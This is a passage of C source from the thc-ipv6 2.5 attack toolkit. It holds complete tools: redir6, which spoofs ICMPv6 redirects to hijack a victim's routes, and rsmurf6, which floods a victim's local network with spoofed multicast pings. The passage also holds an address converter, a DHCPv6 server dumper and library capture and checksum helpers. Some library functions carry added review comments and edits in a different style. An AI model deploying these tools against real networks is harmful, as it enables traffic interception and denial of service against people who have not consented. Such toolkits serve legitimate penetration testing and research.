hdr->pkt[20 + do_hdr_off] = 0; // PPP protocol value for IPv4 hdr->pkt[21 + do_hdr_off] = 0x21; } else if (do_hdr_vlan && do_6in4 == 0) { hdr->pkt[16] = 8; // ethernet protocol value for IPv4 hdr->pkt[17] = 0; } else fprintf(stderr, "Warning: ether option does not 
work with 6in4 injection\n"); } else { hdr->pkt[12] = 8; // ethernet protocol value for IPv4 hdr->pkt[13] = 0; } } strcat(string, thc_ipv62notation(src6)); signal(SIGALRM, alarming); alarm(6); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if (xl) for (i = 0; i < count; i++) thc_send_as_fragment6(interface, src6, dst6, frag_type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1280); else for (i = 0; i < count; i++) while (thc_send_pkt(interface, pkt1, &pkt1_len) < 0) usleep(1); clock_gettime(CLOCK_REALTIME, &ts); printf("0000.000 \t%s packet sent to %s\n", port == 0 ? "ping" : type == NXT_TCP ? "tcp-syn" : "udp", thc_ipv62notation(dst6)); while (1) { thc_pcap_check(p, (char *) check_packets, buf); } return resp_type; // not reached } thc-ipv6-2.5/redir6.c0000644000000000000000000000642612251022440013055 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface victim-ip target-ip original-router new-router [new-router-mac] [hop-limit]\n\n", prg); printf("Implant a route into victim-ip, which redirects all traffic to target-ip to\n"); printf("new-ip. 
You must know the router which would handle the route.\n"); printf("If the new-router-mac does not exist, this results in a DOS.\n"); printf("If the TTL of the target is not 64, then specify this is the last option.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt = NULL, buf[16], mac[16] = ""; unsigned char *mac6 = mac, *src6, *target6, *oldrouter6, *newrouter6, *self6, *fakemac; thc_ipv6_hdr *ipv6; char *interface; int pkt_len, rawmode = 0, ttl = 64, offset = 14; if (argc < 6 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (do_hdr_size) offset = do_hdr_size; interface = argv[1]; src6 = thc_resolve6(argv[2]); target6 = thc_resolve6(argv[3]); oldrouter6 = thc_resolve6(argv[4]); if ((newrouter6 = thc_resolve6(argv[5])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[5]); exit(-1); } if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } /* Spoof source mac */ if ((self6 = thc_get_own_ipv6(interface, oldrouter6, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: could not get own IP address to contact original-router\n"); exit(-1); } if ((fakemac = thc_get_mac(interface, self6, oldrouter6)) == NULL) { fprintf(stderr, "Error: could not resolve mac address for original-router\n"); free(self6); exit(-1); } if (rawmode == 0) { if (argc >= 7) sscanf(argv[6], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); } if (argc >= 8) ttl = atoi(argv[7]); if (ttl <= 0 || ttl > 255) ttl = 64; memset(buf, 'A', 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, target6, src6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, 
ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } usleep(25000); ipv6 = (thc_ipv6_hdr *) pkt; thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset); ipv6->pkt[offset + 7] = (unsigned char) ttl; thc_redir6(interface, oldrouter6, fakemac, NULL, newrouter6, mac6, ipv6->pkt + 14, ipv6->pkt_len - 14); printf("Sent ICMPv6 redirect for %s\n", argv[3]); free(self6); free(fakemac); return 0; } thc-ipv6-2.5/address6.c0000644000000000000000000001204012251022433013364 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax:\n\t%s mac-address [ipv6-prefix]\n", prg); printf("\t%s ipv4-address [ipv6-prefix]\n", prg); printf("\t%s ipv6-address\n\n", prg); printf("Converts a mac or IPv4 address to an IPv6 address (link local if no prefix is\n"); printf("given as 2nd option) or, when given an IPv6 address, prints the mac or IPv4\n"); printf("address. Prints all possible variations. 
Returns -1 on errors or the number of\n"); printf("variations found\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *ptr, *dst6, ipv4[16] = "", ipv6[40], *prefix; int i, j, k, found = 0; struct in_addr in; if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if ((dst6 = index(argv[1], '/')) != NULL) *dst6 = 0; if ((dst6 = thc_resolve6(argv[1])) != NULL) { // ipv6 address if (dst6[11] == 0xff && dst6[12] == 0xfe) { // EUI-64 encoding of mac printf("%02x:%02x:%02x:%02x:%02x:%02x\n", (dst6[8] ^ 2), dst6[9], dst6[10], dst6[13], dst6[14], dst6[15]); return 1; } if (dst6[8] + dst6[10] + dst6[12] + dst6[14] == 0 && dst6[9] != 0) { // hexdecimal ipv4 j = 0; for (i = 0; i < 4; i++) if (dst6[9 + i*2] > 9) j++; if (j > 0) { sprintf(ipv4, "%d.%d.%d.%d", dst6[9], dst6[11], dst6[13], dst6[15]); if (inet_aton(ipv4, &in) != 0) { printf("%s\n", ipv4); found++; } } } if (dst6[8] + dst6[9] + dst6[10] + dst6[11] == 0 && dst6[12] != 0) { // hexdecimal ipv4 #2 sprintf(ipv4, "%d.%d.%d.%d", dst6[12], dst6[13], dst6[14], dst6[15]); if (inet_aton(ipv4, &in) != 0) { printf("%s\n", ipv4); found++; } } // now try for decimal ipv4 encoding memset(dst6, 0, 8); ptr = thc_ipv62notation(dst6); ptr += 2; j = 0; for (i = 0; i < strlen(ptr); i++) if (ptr[i] > ':') j++; else if (ptr[i] == ':') ptr[i] = '.'; if (j == 0 && inet_aton(ptr, &in) != 0) { j = 0; for (i = 0; i < strlen(ptr); i++) if (ptr[i] == '.') j++; if (j == 3) { printf("%s\n", ptr); found++; } } if (found > 0) return found; fprintf(stderr, "Error: the IPv6 address does not contain a mac or encoded IPv4 address\n"); return -1; } // now check for a prefix argument if (argc == 3) { if ((ptr = index(argv[2], '/')) != NULL) *ptr = 0; if ((prefix = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: invalid prefix: %s\n", argv[2]); return -1; } } else prefix = thc_resolve6("fe80::"); if (index(argv[1], '.') != NULL) { // ipv4 to ipv6 ptr = argv[1]; for (i = 0; i < 4; i++) { if ((dst6 = index(ptr, 
'.')) != NULL) *dst6 = 0; ipv4[i] = atoi(ptr); if ((i < 3 && dst6 == NULL) || (i == 3 && dst6 != NULL)) { i = 3; ipv4[0] = 0; } else if (dst6 != NULL) ptr = dst6 + 1; } j = 0; k = 0; for (i = 0; i < 4; i++) { if (ipv4[i] > 255) j++; if (ipv4[i] > 9) k = 1; } if (j == 0 && ipv4[0] != 0) { // from here we know its a valid ipv4 address memcpy(ipv6, prefix, 8); memset(ipv6 + 8, 0, 8); for (i = 0; i < 4; i++) ipv6[9 + i*2] = ipv4[i]; printf("%s\n", thc_ipv62notation(ipv6)); // hex representation #1 memset(ipv6 + 8, 0, 4); memcpy(ipv6 + 12, ipv4, 4); printf("%s\n", thc_ipv62notation(ipv6)); // hex representation #2 memset(ipv6 + 8, 0, 7); ipv6[15] = ipv4[3]; printf("%s\n", thc_ipv62notation(ipv6)); // hex representation #3 if (k) { // do we need decimal representation too, or would it be a double? sprintf(ipv6, "::%d:%d:%d:%d", ipv4[0], ipv4[1], ipv4[2], ipv4[3]); dst6 = thc_resolve6(ipv6); memcpy(dst6, prefix, 8); printf("%s\n", thc_ipv62notation(dst6)); } if (ipv4[3] < 10) return (3 + k); else { // 2nd decimal representation sprintf(ipv6, "::%d", ipv4[3]); dst6 = thc_resolve6(ipv6); memcpy(dst6, prefix, 8); printf("%s\n", thc_ipv62notation(dst6)); return (4 + k); } } } if (index(argv[1], ':') != NULL) { // mac to ipv6 sscanf(argv[1], "%x:%x:%x:%x:%x:%x", (unsigned int *) &k, (unsigned int *) &ipv6[9], (unsigned int *) &ipv6[10], (unsigned int *) &ipv6[13], (unsigned int *) &ipv6[14], (unsigned int *) &ipv6[15]); memcpy(ipv6, prefix, 8); ipv6[8] = (k ^ 2); ipv6[11] = 0xff; ipv6[12] = 0xfe; printf("%s\n", thc_ipv62notation(ipv6)); return 1; } fprintf(stderr, "Error: neither a valid mac, IPv4 or IPv6 address\n"); return -1; } thc-ipv6-2.5/dump_dhcp6.c0000644000000000000000000001472612251022434013720 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" char *interface = NULL, *dns_name = NULL, elapsed[6] = { 0, 8, 0, 2, 0, 0 }; int counter = 0; // start0: 1-3 rand, 18-21 rand, 22-27 
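mac, 32-35 rand char solicit[] = { 0x01, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0e, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; char dnsupdate1[] = { 0, 39, 0, 8, 1, 6, 122, 97, 97, 97, 97, 97 }; char dnsupdate2[] = { 0, 6, 0, 2, 0, 39 }; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface\n\n", prg); printf("DHCPv6 information tool. Dumps the available servers and their setup.\n"); exit(-1); } void clean_exit(int signo) { printf("\n%d server%s found\n", counter, counter == 1 ? "" : "s"); exit(0); }

/*
 * pcap callback: decode one captured frame as a DHCPv6 reply and print the
 * sender's IPv6 address, the MAC taken from frame bytes 6..11, and the
 * options the reply carries.
 *
 * foo     unused user pointer handed through by the capture loop
 * header  pcap metadata; caplen bounds every read from data
 * data    captured frame, starting at the link-layer header
 *
 * The frame comes straight from the network, so each offset is checked
 * against the captured length (and each option field against the option's
 * own length) before it is read. A frame that is too short is ignored; an
 * option whose length runs past the capture prints "Evil Packet!" and stops
 * decoding.
 */
void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  int len = header->caplen, i, j;
  unsigned char *ptr = (unsigned char *) data, *rdata;
  int l2len = do_hdr_size ? do_hdr_size : 14;   /* link-layer bytes in front of the IPv6 header */

  /* same minimum as before (126 bytes after the link-layer header), but
     tested before the first byte of the packet is touched */
  if (len < l2len + 126)
    return;
  data += l2len;
  len -= l2len;
  if (do_hdr_size && (data[0] & 240) != 0x60)   /* injection mode: accept IP version 6 only */
    return;
  rdata = (unsigned char *) data;

  if (data[6] != NXT_UDP || data[48] != 2)
    return;

  data += 48;   /* byte 48 is the one tested against 2 above */
  len -= 48;
  data += 4;    /* step over that byte and the three bytes following it */
  len -= 4;

  if (len >= 4) {
    counter++;
    printf("\nDHCPv6 packet received:\n");
    printf(" Server IP6: %s\n", thc_ipv62notation(rdata + 8));
    printf(" Server MAC: %02x:%02x:%02x:%02x:%02x:%02x\n", ptr[6], ptr[7], ptr[8], ptr[9], ptr[10], ptr[11]);
    while (len >= 4) {
      i = data[0] * 256 + data[1];   /* option type */
      j = data[2] * 256 + data[3];   /* option data length */
      if (j + 4 > len) {
        printf("Evil Packet!\n");
        return;
      }
      /* the option occupies data[0 .. 3 + j]; a field is only read when j
         says it lies inside the option */
      switch (i) {
      case 1:   /* client identifier: nothing printed */
        break;
      case 2:   /* server identifier: nothing printed */
        break;
      case 3:
        /* reads data[16], data[17] and the 16 address bytes at data[20..35] */
        if (j >= 32 && data[16] == 0 && data[17] == 5)
          printf(" Address Offered: %s\n", thc_ipv62notation((unsigned char *) data + 20));
        break;
      case 7:   /* preference value: nothing printed */
        break;
      case 13:
      case 19:
        /* NOTE(review): RFC 3315 appears to place the 2-byte status code at
           data[4..5]; the offsets are kept as in the original - confirm */
        if (j >= 3)
          printf(" Status Code: %d", data[5] * 256 + data[6]);
        break;
      case 23:
        /* reads the 16 address bytes at data[4..19] */
        if (j >= 16)
          printf(" DNS Server: %s\n", thc_ipv62notation((unsigned char *) data + 4));
        break;
      default:
        printf(" Unknown option type: %d\n", i);
      }
      len -= (4 + j);
      data += (4 + j);
    }
  }
}

int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL; char wdatabuf[1024]; unsigned char *mac6 = mac, *src, *dst; int i, s, len, pkt_len = 0; unsigned long long int count = 0; pcap_t *p = NULL; int do_all = 1, use_real_mac = 1, use_real_link = 1; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "dnNr1")) >= 0) { switch (i) { case 'N': use_real_link = 1; // no break case 'n': use_real_mac = 1; break; case '1': do_all = 0; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } memset(mac, 0, sizeof(mac)); interface = argv[optind]; if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } dns_name = argv[optind + 1]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) mac6 = thc_get_own_mac(interface); dst = thc_resolve6("ff02::1:2"); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); // only to prevent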
our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } len = sizeof(solicit); memcpy(wdatabuf, solicit, len); printf("Sending DHCPv6 Solicitate message ...\n"); if (!use_real_link) memcpy(src + 8, (char *) &count, 8); // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 32] = rand() % 256; wdatabuf[i + 18] = rand() % 256; mac[i + 2] = rand() % 256; } if (!use_real_mac) memcpy(wdatabuf + 22, mac, 6); memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; // we have to tone it down, otherwise we will not get advertisements if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) printf("!"); alarm(5); signal(SIGALRM, clean_exit); // i = thc_send_pkt(interface, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); while (1) { usleep(75); while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } return 0; // never reached } thc-ipv6-2.5/rsmurf6.c0000644000000000000000000000354612251022441013267 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface victim-ip\n\n", prg); printf("Smurfs the local network of the victim. 
Note: this depends on an\n"); printf("implementation error, currently only verified on Linux.\n"); printf("Evil: \"ff02::1\" as victim will DOS your local LAN completely\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt = NULL, buf[16], fakemac[7] = "\x00\x00\xde\xad\xbe\xef"; unsigned char *multicast6, *victim6; int pkt_len = 0; char *interface; int rawmode = 0; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } interface = argv[1]; victim6 = thc_resolve6(argv[2]); multicast6 = thc_resolve6("ff02::1"); if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } memset(buf, 'A', 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, multicast6, victim6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0) return -1; if (thc_generate_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Starting rsmurf6 against %s (Press Control-C to end) ...\n", argv[2]); while (1) thc_send_pkt(interface, pkt, &pkt_len); return 0; } thc-ipv6-2.5/thc-ipv6-lib.c0000644000000000000000000030313012254411074014066 0ustar rootroot/* * (c) 2013 by van Hauser / THC * * THC IPv6 Attack Library * * Functions: see README * * The AGPL v3 license applies to this code, see the LICENSE file * */ #include #include #include #include #include #include /* network */ #include #include #include #include #include #include #include //#include #include /* files */ #include #include /* misc */ #include #include /* libpcap */ #include #include "thc-ipv6.h" #ifdef _HAVE_SSL /* libssl */ #include #include #include #include #endif /* OS specifics */ #if defined(__APPLE__) #include #define 
bswap_16 OSSwapInt16 #define bswap_32 OSSwapInt32 #define bswap_64 OSSwapInt64 #else #include #endif #if !defined (SIOCGIFHWADDR) #include #include #include #else #include #include #endif // exported to external via thc-ipv6.h int debug = 0; int _thc_ipv6_showerrors = SHOW_LIBRARY_ERRORS; int do_hdr_size = 0, do_hdr_vlan = 0; // injection variables #define _PPPOE_HDR_SIZE 22 #define _6IN4_HDR_SIZE 34 int do_6in4 = 0, do_pppoe = 0, do_hdr_off = 0; char *do_hdr = NULL, *do_capture = NULL; // other internal global vars char default_interface[16] = "eth0"; int thc_socket = -1; int _thc_ipv6_rawmode = 0; void thc_ipv6_rawmode(int mode) { _thc_ipv6_rawmode = mode; fprintf(stderr, "Error: raw mode is not working, use THC_IPV6_... injection!\n"); exit(-1); } void thc_ipv6_show_errors(int mode) { _thc_ipv6_showerrors = mode; } unsigned char *thc_ipv6_dummymac() { char *ptr = malloc(7); if (ptr == NULL) return NULL; memset(ptr, 0xff, 6); ptr[6] = 0; return ptr; } int thc_pcap_function(char *interface, char *capture, char *function, int promisc, char *opt) { pcap_t *pcap_link = NULL; char errbuf[PCAP_ERRBUF_SIZE]; struct bpf_program fcode; if (thc_socket < 0) thc_socket = thc_open_ipv6(); if (do_pppoe || do_6in4 || do_hdr_vlan) promisc = 1; if (interface == NULL) interface = default_interface; if ((pcap_link = pcap_open_live(interface, 65535, promisc, -1, errbuf)) == NULL) return -1; if (do_pppoe || do_6in4 || do_hdr_vlan) pcap_compile(pcap_link, &fcode, do_capture, 1, 0); else if (pcap_compile(pcap_link, &fcode, capture, 1, 0) < 0) return -2; pcap_setfilter(pcap_link, &fcode); while(1) { if (pcap_dispatch(pcap_link, 1, (pcap_handler) function, opt) < 0) return -3; usleep(10); } return -4; // never reached } pcap_t *thc_pcap_init(char *interface, char *capture) { pcap_t *pcap_link = NULL; char errbuf[PCAP_ERRBUF_SIZE]; struct bpf_program fcode; int promisc = 0; if (thc_socket < 0) thc_socket = thc_open_ipv6(); if (do_pppoe || do_6in4 || do_hdr_vlan) promisc = 1; if (interface 
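== NULL) interface = default_interface; if ((pcap_link = pcap_open_live(interface, 65535, promisc, -1, errbuf)) == NULL) return NULL; if (do_pppoe || do_6in4 || do_hdr_vlan) pcap_compile(pcap_link, &fcode, do_capture, 1, 0); else if (pcap_compile(pcap_link, &fcode, capture, 1, 0) < 0) return NULL; pcap_setfilter(pcap_link, &fcode); pcap_setnonblock(pcap_link, 1, errbuf); return pcap_link; }

/*
 * Open a non-blocking, promiscuous capture on an interface and install a
 * BPF filter on it.
 *
 * interface  device name; NULL selects default_interface
 * capture    filter expression; when one of the injection modes
 *            (do_pppoe, do_6in4, do_hdr_vlan) is set, do_capture is
 *            compiled instead
 *
 * Returns the capture handle, or NULL on any failure. The handle is closed
 * on every failure path, and the filter must both compile and install:
 * previously the injection branch ignored a failed pcap_compile() and went
 * on to install an uninitialised program, and a failed compile in the other
 * branch returned without closing the handle.
 */
pcap_t *thc_pcap_init_promisc(char *interface, unsigned char *capture) {
  pcap_t *pcap_link = NULL;
  char errbuf[PCAP_ERRBUF_SIZE];
  struct bpf_program fcode;
  char *filter;
  int rc;

  if (thc_socket < 0)
    thc_socket = thc_open_ipv6();
  if (interface == NULL)
    interface = default_interface;
  if ((pcap_link = pcap_open_live(interface, 65535, 1, -1, errbuf)) == NULL)
    return NULL;

  if (do_pppoe || do_6in4 || do_hdr_vlan)
    filter = do_capture;
  else
    filter = (char *) capture;

  if (filter == NULL || pcap_compile(pcap_link, &fcode, filter, 1, 0) < 0) {
    pcap_close(pcap_link);
    return NULL;
  }
  rc = pcap_setfilter(pcap_link, &fcode);
  pcap_freecode(&fcode);   /* the compiled program is not needed once installed */
  if (rc < 0) {
    /* without the filter the callback would be handed unrelated traffic */
    pcap_close(pcap_link);
    return NULL;
  }
  pcap_setnonblock(pcap_link, 1, errbuf);

  return pcap_link;
}

/*
 * Hand at most one pending packet on pcap_link to the callback.
 *
 * function  the pcap_handler callback, passed as char * and cast back here
 * opt       user pointer forwarded to the callback
 *
 * Returns -1 when pcap_link is NULL, otherwise the result of pcap_dispatch().
 */
int thc_pcap_check(pcap_t * pcap_link, char *function, char *opt) {
  if (pcap_link == NULL)
    return -1;
  return pcap_dispatch(pcap_link, 1, (pcap_handler) function, opt);
}

/*
 * Close a capture handle (NULL is accepted). Always returns NULL.
 */
char *thc_pcap_close(pcap_t * pcap_link) {
  if (pcap_link != NULL)
    pcap_close(pcap_link);
  return NULL;
}

/* wow, ugly, complicated work for something a standard linux library could do as well :-) */ void thc_notation2beauty(unsigned char *ipv6) { char buf[40], buf2[40] = ":0:0:", *ptr, *ptr2 = NULL; int i, j, k = 0, l = 0; if (ipv6[39] != 0 || strlen(ipv6) != 39) return; memset(buf, 0, sizeof(buf)); // remove leading zeros from ipv6-input to buf, :0023: = :23:, :0000: = :0: for (i = 0; i < 8; i++) { ptr = ipv6 + i * 4 + i; j = 0; while (*ptr == '0' && j < 3) { ptr++; j++; } memcpy(&buf[k], ptr, 4 - j); k += 4 - j; buf[k++] = ':'; } buf[k - 1] = 0; // find the longest :0: chain while ((ptr = strstr(buf, buf2)) != NULL) { ptr2 = ptr; strcat(buf2, "0:"); } // if at least :0:0: is found, on the longest replace with ::,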
ptr2 shows where if (ptr2 != NULL) { buf2[strlen(buf2) - 2] = 0; memset(ipv6, 0, 40); // special case: 0000::.... if (buf + 1 == ptr2 && buf[0] == '0') { ipv6[0] = ':'; l = -1; } else memcpy(ipv6, buf, ptr2 - buf + 1); memcpy(ipv6 + (ptr2 - buf + 1 + l), ptr2 + strlen(buf2) - 1, strlen(buf) - (ptr2 - buf) - strlen(buf2) + 1); // special case ....::0000 if (ipv6[strlen(ipv6) - 1] == '0' && ipv6[strlen(ipv6) - 2] == ':' && ptr2 - buf + 1 + strlen(buf2) == strlen(buf)) ipv6[strlen(ipv6) - 1] = 0; } else strcpy(ipv6, buf); // if (strncmp(ipv6, "::ffff:", 7) == 0 && strlen(ipv6) <= 16) { // printf("XXX beauty for ::ffff:123.123.132.123\n"); // } } unsigned char *thc_ipv62string(unsigned char *ipv6) { char *string = malloc(33); int a; if (ipv6 != NULL && string != NULL) { for (a = 0; a < 16; a++) { if (ipv6[a] / 16 >= 10) string[a * 2] = 'a' + ipv6[a] / 16 - 10; else string[a * 2] = '0' + ipv6[a] / 16; if (ipv6[a] % 16 >= 10) string[a * 2 + 1] = 'a' + ipv6[a] % 16 - 10; else string[a * 2 + 1] = '0' + ipv6[a] % 16; } string[32] = 0; } else return NULL; return string; } unsigned char *thc_string2ipv6(unsigned char *string) { unsigned char *ipv6 = malloc(16); int a; if (string != NULL && ipv6 != NULL) { for (a = 0; a < 16; a++) { ipv6[a] = (string[2 * a] >= 'a' ? 10 + string[2 * a] - 'a' : string[2 * a] - '0') * 16; ipv6[a] += string[2 * a + 1] >= 'a' ? 
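10 + string[2 * a + 1] - 'a' : string[2 * a + 1] - '0';
    }
  } else
    return NULL;
  return ipv6;
}

/*
 * Turn a 32-character hex string into colon-separated IPv6 notation.
 *
 * Copies eight groups of four characters from `string`, separates them with
 * ':' and passes the 39-character result to thc_notation2beauty().
 * `string` must provide at least 32 readable bytes; they are copied as-is
 * and are not checked for being hex digits.
 *
 * Returns a malloc()ed, NUL-terminated buffer owned by the caller, or NULL
 * if `string` is NULL or the allocation fails.
 */
unsigned char *thc_string2notation(unsigned char *string) {
  unsigned char *notation;
  int a;

  /* validate before allocating so the NULL path cannot leak the buffer */
  if (string == NULL)
    return NULL;
  if ((notation = malloc(40)) == NULL)
    return NULL;

  for (a = 0; a < 8; a++) {
    memcpy(notation + a * 5, string + a * 4, 4);
    notation[4 + a * 5] = ':';
  }
  notation[39] = 0;             /* overwrites the ':' written after the last group */

  thc_notation2beauty(notation);
  return notation;
}

/*
 * Convert a 16-byte binary IPv6 address to its textual notation by chaining
 * thc_ipv62string() and thc_string2notation().
 *
 * Returns a malloc()ed string owned by the caller, or NULL if `ipv6` is NULL
 * or one of the conversion steps fails.
 */
unsigned char *thc_ipv62notation(unsigned char *ipv6) {
  char *res, *ptr;

  if (ipv6 == NULL)
    return NULL;
  if ((res = thc_ipv62string(ipv6)) == NULL)
    return NULL;
  ptr = thc_string2notation(res);
  free(res);                    /* the intermediate hex string is no longer needed */
  return ptr;
}

/*
 * 16-bit ones' complement checksum over `data_len` bytes of `data`.
 *
 * Bytes at even offsets are added as the low byte and bytes at odd offsets
 * as the high byte of a 16-bit word; the sum is folded to 16 bits,
 * complemented and passed through htons().
 */
int calculate_checksum(unsigned char *data, int data_len) {
  unsigned int sum = 0;
  int i = 0;

  if (debug)
    thc_dump_data(data, data_len, "Checksum Packet Data");

  while (i < data_len) {
    if (i++ % 2 == 0)
      sum += *data++;
    else
      sum += (unsigned int) *data++ << 8;
  }

  /* A single fold can itself carry into bit 16; keep folding until the sum
     fits into 16 bits so the end-around carry is not lost. */
  while (sum >> 16)
    sum = (sum & 0xffff) + (sum >> 16);

  return htons((unsigned short) ~sum);
}

/*
 * Checksum for an upper-layer payload.
 *
 * For NXT_IP4 and NXT_IP4_RUDIMENTARY the checksum covers `data` alone.
 * For every other `type` a 40-byte pseudo header is prepended: `src` in
 * bytes 0-15, `dst` in bytes 16-31, the low 16 bits of `length` in bytes
 * 34-35 and `type` in byte 39. A zero result for NXT_UDP is replaced by
 * 65535.
 *
 * Returns the checksum, or -1 if a pointer argument is NULL, `length` is
 * negative, or the scratch buffer cannot be allocated.
 */
int checksum_pseudo_header(unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int length) {
  unsigned char *ptr;
  int checksum;

  /* Validate first: the scratch buffer is sized from `length`, so it must
     not be created before the negative-length check. */
  if (src == NULL || dst == NULL || data == NULL || length < 0)
    return -1;
  if (length > 65535 - 40)
    if (_thc_ipv6_showerrors)
      fprintf(stderr, "Warning: checksums for packets > 65535 are unreliable due implementation differences on target platforms\n");

  /* heap instead of a caller-sized stack array; zero-filled like the
     original memset(), with the original 48 bytes of slack */
  if ((ptr = calloc(1, (size_t) length + 40 + 48)) == NULL)
    return -1;

  if (type == NXT_IP4 || type == NXT_IP4_RUDIMENTARY) {
    memcpy(ptr, data, length);
    checksum = calculate_checksum(ptr, length);
  } else {
    memcpy(&ptr[0], src, 16);
    memcpy(&ptr[16], dst, 16);
    ptr[34] = length / 256;
    ptr[35] = length % 256;
    ptr[39] = type;
    if (length > 0)
      memcpy(&ptr[40], data, length);
    checksum = calculate_checksum(ptr, 40 + length);
  }
  free(ptr);

  if (type == NXT_UDP && checksum == 0)
    checksum = 65535;

  if (debug)
    printf("Checksum: %d = %p, %p, %d, %p, %d\n", checksum, src, dst, type, data, length);

  return checksum;
}

/*
 * Resolve `target` (hostname or IPv6 literal) to a 16-byte binary address.
 *
 * A "/prefix" suffix, a "%scope" suffix and surrounding "[...]" brackets are
 * stripped from a local copy (at most 263 characters) before the lookup.
 * The name is resolved with getaddrinfo() restricted to AF_INET6, so a
 * hostname may trigger a DNS query.
 *
 * Returns a malloc()ed 16-byte buffer owned by the caller, or NULL on any
 * failure.
 */
unsigned char *thc_resolve6(char *target) {
  unsigned char *ret_addr = NULL;
  char *ptr2, *ptr = target, tmp[264];
  struct in6_addr glob_in6;
  struct addrinfo glob_hints, *glob_result = NULL;
  char out[64];

  if (target == NULL)
    return NULL;

  if (strchr(target, '/') != NULL || *target == '[' || strchr(target, '%') != NULL) {
    snprintf(tmp, sizeof(tmp), "%s", target);   /* truncates and always terminates */
    ptr = tmp;
    if ((ptr2 = strchr(tmp, '/')) != NULL)
      *ptr2 = 0;
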